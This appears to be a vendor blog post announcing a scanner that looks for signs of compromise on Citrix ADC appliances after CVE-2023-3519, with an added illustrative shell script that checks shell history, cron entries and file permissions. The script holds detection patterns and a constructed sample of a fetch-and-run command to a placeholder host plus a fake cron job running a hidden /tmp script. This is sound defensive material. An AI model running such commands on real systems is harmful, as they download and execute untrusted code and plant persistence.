Indicators of Compromise Scanner for Citrix ADC Zero-Day (CVE-2023-3519)
Mandiant recently published a blog post about the compromise of Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway appliances related to the zero-day vulnerability tracked as CVE-2023-3519. CVE-2023-3519 is a zero-day vulnerability that can enable remote code execution, and it has been observed being exploited in the wild by a threat actor whose known capabilities and history of targeting Citrix ADCs are consistent with a China nexus. Recently, proof-of-concepts to exploit this vulnerability have been publicly posted.
Today we are releasing a tool to help organizations scan their Citrix appliances for evidence of post-exploitation activity related to CVE-2023-3519. The tool contains indicators of compromise (IOCs) collected during Mandiant investigations and sourced from our partners and the community. Head over to the Mandiant GitHub page to download the tool today to scan your appliances.
The tool is designed to do a best-effort job at identifying existing compromises. It will not identify a compromise 100% of the time, and it will not tell you if a device is vulnerable to exploitation. Keep in mind that applying the upgrade from Citrix will not remove any malware that may have been placed on the appliance. Mandiant recommends that organizations run the scanner on all appliances that were vulnerable and exposed to the Internet for any period of time.
The scanning tool is designed to be run on a live appliance or a mounted forensic image. This scanner will search across a number of sources on the appliance to look for evidence of post-exploitation activity:
- File system paths that are likely to be malware
- Attacker or suspicious commands in the shell history
- Files in NetScaler directories with contents matching known IOCs
- Files with suspicious permissions or ownership
- Suspicious crontab entries
- Suspicious running processes
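The following skeleton, added here as an illustration and not Mandiant's own scanner, shows how three of the sources above (shell history, crontab entries, file permissions) can be checked against a root directory that is either a live system or a mounted forensic image. All patterns, paths and sample data in it are constructed placeholders, not indicators from the Mandiant tool.

```shell
#!/bin/sh
# Skeleton of a post-exploitation IOC scanner covering shell history, crontab
# entries and file permissions. Added example, not Mandiant's tool. ROOT is "/"
# on a live appliance or the mount point of a forensic image. Every pattern,
# path and sample value below is a constructed placeholder, not a real IOC.
ROOT="${ROOT:-/}"

# Constructed detection patterns (POSIX extended regex); substitute real IOCs.
HISTORY_PATTERNS='curl .*\| *sh|chmod \+x /tmp/|nohup .*&$'
CRON_PATTERNS='/tmp/|/var/tmp/|\| *sh( |$)'

# Shell history: print file:line:command for lines matching HISTORY_PATTERNS.
scan_history() {
    find "$ROOT" -type f \( -name '.bash_history' -o -name '.sh_history' \) 2>/dev/null |
    while IFS= read -r f; do grep -HnE "$HISTORY_PATTERNS" "$f" || true; done
}

# Crontab files: non-comment entries matching CRON_PATTERNS.
scan_crontab() {
    find "$ROOT" -type f -path '*cron*' 2>/dev/null |
    while IFS= read -r f; do
        grep -HnEv '^[[:space:]]*#' "$f" | grep -E "$CRON_PATTERNS" || true
    done
}

# File permissions: world-writable or setuid/setgid files under each directory.
scan_perms() {
    for d in "$@"; do
        find "$d" -type f \( -perm -0002 -o -perm -4000 -o -perm -2000 \) 2>/dev/null
    done
}

# Build a throwaway tree with one hit per source (constructed sample data) so
# the scanner can be exercised offline; prints the directory it created.
make_sample_root() {
    t=$(mktemp -d)
    mkdir -p "$t/root" "$t/etc/cron.d" "$t/tmp"
    printf 'ls -la\ncurl http://example.invalid/x | sh\n' > "$t/root/.bash_history"
    printf '# comment\n*/5 * * * * root /bin/sh /tmp/.x.sh\n' > "$t/etc/cron.d/job"
    : > "$t/tmp/.x.sh"; chmod 666 "$t/tmp/.x.sh"
    echo "$t"
}

# Count hits across all three sources for the tree rooted at $1 (sets ROOT).
count_hits() {
    ROOT="$1"
    n=$( { scan_history; scan_crontab; scan_perms "$ROOT/tmp"; } | wc -l | tr -d ' ' )
    echo "$n"
}
```

Run against a real appliance, the placeholder patterns must be replaced with vetted indicators, and process scanning only makes sense on a live system, not on an image.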
The IOC Scanner for CVE-2023-3519 was developed by Mandiant in collaboration with Citrix. It is based on knowledge gleaned from incident response engagements related to exploitation of CVE-2023-3519. The goal of the scanner is to analyze available log sources and system forensic artifacts to identify evidence of successful exploitation of CVE-2023-3519.
There are limitations in what the tool will be able to accomplish, and therefore executing the tool should not be considered a guarantee that a system is free of compromise. For example, log files on the system with evidence of compromise may have been truncated or rolled; the system may have been rebooted; or an attacker may have tampered with the system to remove evidence of compromise and/or installed a rootkit that masks evidence of compromise.
If indications of compromise are identified on systems, organizations should perform a forensic examination of the compromised system to determine the scope and extent of the incident. Download the standalone Bash script from our GitHub repository and follow the instructions in the README for more details on how to run it against an appliance or forensic image.
This software is provided as-is, without warranty or representation for any use or purpose.
As you invent further ways to identify compromise, please consider contributing to this IOC Scanner. We would like to provide the most thorough and correct scanner possible.
The primary goal is to report high confidence IOCs. Because users may rely on the output of this tool to initiate further investigation, it's important that we don't send them on a wild goose chase. Any evidence of an actor gaining access to the system, fetching information, or creating content should always be reported. To contribute indicators please send us a pull request or open an issue if you’re not sure of the best way to hunt for your new indicator.
If you identify evidence of compromise on your Citrix ADC and want support with your investigation, feel free to contact Mandiant at firstname.lastname@example.org.
Mandiant thanks Citrix for their support and partnership. Mandiant would like to thank the Shadowserver Foundation for their excellent blog post and support. This tool is based on the framework previously developed by Willi Ballenthin and the team for CVE-2019-19781.
Citrix released security bulletin CTX561482 on July 18, describing vulnerabilities in Citrix NetScaler ADC and Citrix NetScaler Gateway. CVE-2023-3519, one of those vulnerabilities, could allow an unauthenticated remote attacker to perform arbitrary code execution.
We hope our IOC Scanner tool helps organizations and the security community identify and defend against attacks related to CVE-2023-3519, and look forward to seeing contributions and feedback.